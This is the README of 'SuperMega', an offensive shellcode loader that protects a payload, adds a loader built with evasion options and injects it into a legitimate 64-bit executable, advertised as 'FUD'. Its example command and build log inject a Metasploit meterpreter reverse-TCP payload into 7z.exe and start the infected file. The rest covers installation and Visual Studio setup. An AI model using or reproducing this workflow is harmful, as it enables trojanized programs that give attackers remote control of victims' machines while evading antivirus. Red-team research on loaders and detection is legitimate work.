# SuperMega - Cordyceps Implementation

> Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes
> insect hosts of the order Hymenoptera, primarily ants. O.
> camponoti-balzani infects ants, and eventually kills the hosts after
> they move to an ideal location for the fungus to spread its spores.

## What

SuperMega is a shellcode loader. It takes a shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an exe. FUD.

And:

* Only works with 64 bit (shellcode and infectable exes)

Features:

* Loader source is C yay
* Execution-Guardrails
* Environment variables
* configurable implementation
* different EXE injection techniques

Plugins:

* source style:
  * PEB_WALK
  * IAT_REUSE
* alloc style:
  * RWX
  * REUSE_RWX
* decoder style:
  * PLAIN_1
  * XOR_1
* dataref style:
  * APPEND

## Examples

### Metasploit in 7z

Inject metasploit into 7z.exe. It will use PEB_WALK.

```
PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py ) --[ Remove old files ]
(model.py ) --( Capabilities:
(model.py ) 0x0: GetEnvironmentVariableW (b'')
(model.py ) 0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup : build\main.asm ]
(compiler.py ) > Replace external reference at line: 8
(compiler.py ) > Replace external reference at line: 395
(compiler.py ) > Replace payload length at line: 389
(compiler.py ) > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py ) --[ Code section: .text
(helper.py ) > 0x1000 Code Size: 2557 (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449 Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]
```

## Directories

* `shellcodes/`: Input: Shellcodes we want to use as input (payload)
* `source/`: Input: Loader C templates
* `plugins/`: Input: Loader C implementations
* `exes/`: Input: Nonmalicious EXE files we inject into
* `build/`: build: Temporary files during build process
* `logs/`: build: Files generated by building (inspect for debugging)
* `out/`: output: The generated result (infected exe)

## Installation

### Paths

Configure `config.yaml` with:

* Path to Visual Studio 2022 compiler and assembler
* Path to masm_shc and runshc: https://github.com/hasherezade/masm_shc

`config.yaml`:

```yaml
path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
path_ml64: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'
path_masmshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'
```

Make sure `path_cl` and `path_ml64` point to the `Hostx64/x64/` executables. Make sure to compile masm_shc and runshc as 64 bit.

You can also replace runshc with your own shellcode loader.

### Environment Variables

It needs all the Microsoft Visual Studio specific paths as environment variables. Either start the "visual studio developer console", or if you are sane, use the following command line to get all the damn env right. Use this when you get `Cannot find Windows.h`.

```
cmd.exe /c "`"C:\Program Files (x86)\Microsoft Visual Studio\\\Common7\Tools\VsDevCmd.bat`" && powershell"
```

Also make sure radare2 is in the path:

```
$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin"
```

### Alternative

Use

```
"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
```

or the VS developer console to find the damn environment variables, and set them in your python console. In my case:

```
$env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um"
$env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64"
$env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
```

### VS2022 Components

A list of packages/components which may be required for Visual Studio 2022:

* C++ 2022 Redistributable Update
* C++ Build Insights
* C++ CMake tools for Windows
* C++/CLI support for v143 build tools (latest)
* MSBuild
* MSVC v143 - VS 2022 C++ x64/x86 build tools (latest)
* C++ ATL for latest v143 build tools (x86 & x64)
* C++ MFC for latest v143 build tools (x86 & x64)
* Windows 11 SDK